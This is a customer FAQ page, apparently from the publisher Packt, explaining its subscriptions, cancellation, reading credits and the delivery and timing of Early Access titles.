A subscription provides you with full access to view all Packt and licnesed content online, this includes exclusive access to Early Access titles. Depending on the tier chosen you can also earn credits and discounts to use for owning content

How can I cancel my subscription? Chevron down icon Chevron up icon

To cancel your subscription with us simply go to the account page - found in the top right of the page or at https://subscription.packtpub.com/my-account/subscription - From here you will see the ‘cancel subscription’ button in the grey box with your subscription information in.

What are credits? Chevron down icon Chevron up icon

Credits can be earned from reading 40 section of any title within the payment cycle - a month starting from the day of subscription payment. You also earn a Credit every month if you subscribe to our annual or 18 month plans. Credits can be used to buy books DRM free, the same way that you would pay for a book. Your credits can be found in the subscription homepage - subscription.packtpub.com - clicking on ‘the my’ library dropdown and selecting ‘credits’.

What happens if an Early Access Course is cancelled? Chevron down icon Chevron up icon

Projects are rarely cancelled, but sometimes it's unavoidable. If an Early Access course is cancelled or excessively delayed, you can exchange your purchase for another course. For further details, please contact us here.

Where can I send feedback about an Early Access title? Chevron down icon Chevron up icon

If you have any feedback about the product you're reading, or Early Access in general, then please fill out a contact form here and we'll make sure the feedback gets to the right team. 

Can I download the code files for Early Access titles? Chevron down icon Chevron up icon

We try to ensure that all books in Early Access have code available to use, download, and fork on GitHub. This helps us be more agile in the development of the book, and helps keep the often changing code base of new versions and new technologies as up to date as possible. Unfortunately, however, there will be rare cases when it is not possible for us to have downloadable code samples available until publication.

When we publish the book, the code files will also be available to download from the Packt website.

How accurate is the publication date? Chevron down icon Chevron up icon

The publication date is as accurate as we can be at any point in the project. Unfortunately, delays can happen. Often those delays are out of our control, such as changes to the technology code base or delays in the tech release. We do our best to give you an accurate estimate of the publication date at any given time, and as more chapters are delivered, the more accurate the delivery date will become.

How will I know when new chapters are ready? Chevron down icon Chevron up icon

We'll let you know every time there has been an update to a course that you've bought in Early Access. You'll get an email to let you know there has been a new chapter, or a change to a previous chapter. The new chapters are automatically added to your account, so you can also check back there any time you're ready and download or read them online.

I am a Packt subscriber, do I get Early Access? Chevron down icon Chevron up icon

Yes, all Early Access content is fully available through your subscription. You will need to have a paid for or active trial subscription in order to access all titles.

How is Early Access delivered? Chevron down icon Chevron up icon

Early Access is currently only available as a PDF or through our online reader. As we make changes or add new chapters, the files in your Packt account will be updated so you can download them again or view them online immediately.

How do I buy Early Access content? Chevron down icon Chevron up icon

Early Access is a way of us getting our content to you quicker, but the method of buying the Early Access course is still the same. Just find the course you want to buy, go through the check-out steps, and you’ll get a confirmation email from us with information and a link to the relevant Early Access courses.

What is Early Access? Chevron down icon Chevron up icon

Keeping up to date with the latest technology is difficult; new versions, new frameworks, new techniques. This feature gives you a head-start to our content, as it's being created. With Early Access you'll receive each chapter as it's written, and get regular updates throughout the product's development, as well as the final course as soon as it's ready.We created Early Access as a means of giving you the information you need, as soon as it's available. As we go through the process of developing a course, 99% of it can be ready but we can't publish until that last 1% falls in to place. Early Access helps to unlock the potential of our content early, to help you start your learning when you need it most. You not only get access to every chapter as it's delivered, edited, and updated, but you'll also get the finalized, DRM-free product to download in any format you want when it's published. As a member of Packt, you'll also be eligible for our exclusive offers, including a free course every day, and discounts on new and popular titles.